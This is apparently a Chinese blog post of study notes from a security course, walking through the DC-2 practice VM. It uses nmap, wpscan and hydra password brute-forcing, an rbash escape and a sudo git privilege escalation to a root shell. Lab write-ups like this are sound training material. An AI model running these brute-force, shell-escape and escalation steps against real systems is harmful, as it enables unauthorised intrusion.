引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初次接触,出现对其理解不深入,不完整,甚至也会出现错误有问题的地方,希望大家谅解、留言提出指正,同时也欢迎大家来找我一起交流学习!!!
往期博客:
第一阶段:
[网络安全学习篇1]:windowsxp、windows2003、windows7、windows2008系统部署(千峰网络安全视频笔记)
[网络安全学习篇24]:漏洞与木马(千峰网络安全视频笔记 p117-p118)
第二阶段:
[网络安全学习篇25]:初识Linux及简单命令
[网络安全学习篇32]:Linux脚本编写汇总及应用
第三阶段:
[网络安全学习篇33]:0基础带你入门python
[网络安全学习篇38]:基础环境搭建
[网络安全学习篇39]:HTML标签基础 常用的标签 表格
[网络安全学习篇42]:靶场环境搭建(ubuntu系统安装优化及vulhub安装)
[网络安全学习篇43]:PHP基础+变量 运算符 流程控制语句
[网络安全学习篇48]:JS 基础 函数 事件)
第四阶段:
[网络安全学习篇49]:渗透测试方法论
[网络安全学习篇50]:Web架构安全分析
[网络安全学习篇51]:信息收集
[网络安全学习篇52]:扫描技术
[网络安全学习篇53]:口令破解
[网络安全学习篇54]:SQL注入
[网络安全学习篇55]:SQL自动化注入
[网络安全学习篇56]:XSS
[网络安全学习篇57]:XSS(二)
[网络安全学习篇58]:PHP代码注入
[网络安全学习篇59]:OS命令注入
[网络安全学习篇60]:文件上传
[网络安全学习篇61]:文件包含
[网络安全学习篇62]:CSRF 攻击
[网络安全学习篇63]:SSRF
[网络安全学习篇64]:业务安全
[网络安全学习篇65]:提权
[网络安全学习篇66]:Metasploit(MSF)
[网络安全学习篇67]:python poc-exp
[网络安全学习篇68]:反序列化漏洞
[网络安全学习篇69]:渗透测试实战-DC-1-靶机入侵
[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵(本篇)
下期博文:
[网络安全学习篇71]:渗透测试实战-DC-3-靶机入侵
目录
DC-2 靶机实战
flag1
flag2
flag3
绕过限制
flag4
final-flag
提权
靶机资源:
链接:https://pan.baidu.com/s/1L-fHw8bNAPHS6jHx1BJA3A
提取码:8r7m
启动DC-2
配置其网络为NAT 查看其Mac 地址,重启DC-2 使其网路配置生效
使用nmap 扫描内网网段
得到DC-2 的IP地址192.168.1.162
对其进行信息收集
访问其IP ,连接失败
添加本地DNS解析
vim /etc/hosts
再访问该网站,成功
cewl 工具
cewl dc-2 >pwd.dic
网站目录扫描
使用MSF 进行网站目录扫描
use auxiliary/scanner/http/dir_scanner
set RHOSTS 192.168.1.162
set THREADS 50
exploit
wpscan工具
wpscan --update
apt-get install wpscan wpscan 更新
注:如果wpscan 无法使用,可以尝试更换新的kali 虚拟机,笔者就碰到类似的问题,安装 kali 2020.2 之后,wpscan 启动成功
附清华大学开源镜像站kali2020.2(amd64,installer)下载链接
https://mirrors.tuna.tsinghua.edu.cn/kali-images/current/kali-linux-2020.2-installer-amd64.iso
wpscan --url dc-2 -e u
wpscan 爆破用户
wpscan --url dc-2 -U user.dic -P pwd.dic
192.168.1.162/wp-admin
使用jerry用户并用我们爆破出来的密码尝试登录
找到flag2
他告诉我们需要另辟蹊径,我们想到了刚开始使用nmap 扫描时,还扫出了ssh 端口7744
hydra 爆破ssh
hydra -L user.dic -P pwd.dic ssh://192.168.1.162 -s 7744 -o hydra.ssh -vV
查看结果:
尝试使用ssh 登录
ssh [email protected] -p 7744
查看当前目录文件
ls
cat flag3.txt
发现有rbash 命令限制
BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
切换用户
切换jerry用户
su jerry
输入密码,登录成功
我们进入到jerry 用户的家目录
执行命令,发现没有权限
查看具有root权限的命令
sudo -l
发现git 命令具有root 权限,但是不需要提供给root 密码
git 提权
sudo git -p --help
强制进入交互式状态,让页面缓冲区无法显示全部信息
!/bin/bash
参考文献:
千峰网络信息安全开源课程